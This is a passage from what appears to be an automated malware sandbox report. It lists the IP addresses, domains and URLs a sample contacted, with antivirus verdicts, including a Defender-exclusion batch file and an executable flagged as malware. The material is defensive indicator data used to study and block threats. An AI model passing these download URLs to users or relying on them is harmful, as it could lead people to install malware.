46606 UNIFIEDLAYER-AS-1US false
37.46.150.139
 unknown Moldova Republic of
8758 IWAYCH false
104.22.1.232
 unknown United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
cutt.ly 104.22.1.232 true
trashbininspector.fun 104.18.58.219 true
chebo.discountmonumentcenter.com 192.185.194.191 true
telete.in 195.201.225.248 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat false
  • Avira URL Cloud: safe
 unknown
http://chebo.discountmonumentcenter.com/vantuz_2021.exe true
  • Avira URL Cloud: malware
 unknown